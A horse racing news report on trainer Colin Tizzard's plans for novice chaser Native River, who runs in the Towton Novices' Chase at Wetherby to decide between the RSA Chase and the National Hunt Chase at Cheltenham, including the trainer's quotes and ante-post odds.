RSA or National Hunt Chase – that is the dilemma, albeit a nice one, facing Colin Tizzard, who may well discover the answer on Saturday when Native River contests the Grade 2 Totepool Towton Novices’ Chase at Wetherby.

A fair performer over hurdles, Native River has further showcased his talents over the larger obstacles this season, with victories in two novice chases, at Exeter and Newbury, placing him firmly in the ante-post markets for the Festival.

He lines up at Wetherby off the back of a third in the Grade 1 Kauto Star Novices’ Chase at Kempton over Christmas, with his conqueror that day Tea For Two heading to Sandown instead of renewing rivalries.

Tizzard’s leading novice chaser is a general 25-1 shot to land the RSA Chase, while he is as short as 8-1 with Paddy Power to secure victory in the 4m National Hunt Chase in March.

Tizzard said: “This is Native River’s prep race for Cheltenham and should give us an idea of whether to go for the RSA Chase or National Hunt Chase.

“He appeared to jump left at Kempton which was obviously costing him ground all the way around. He got into all sorts of trouble and did not seem to act around there at all. It is to his credit that he was only beaten as far as he was.”

Plans to emerge

The Dorset-based trainer makes the 550-mile round trip in the hope Native River will be better suited by Wetherby and the six-year-old’s finishing position looks set to dictate which race connections target at Cheltenham.

“The Towton is a good prize and we think that Wetherby will suit him much better than Kempton. He won nicely at Newbury the time before in a similar race,” he said.

“It would be nice to think he is good enough for the RSA but if he is a staying on third then he will probably go for the National Hunt Chase.”

High-quality renewal

The Wetherby feature is far from an easy prep with Harry Fry’s Bitofapuzzle, who is also declared at Sandown, Nigel Twiston-Davies’s Blaklion and Brian Ellison’s Definitely Red all bringing solid form to the race.
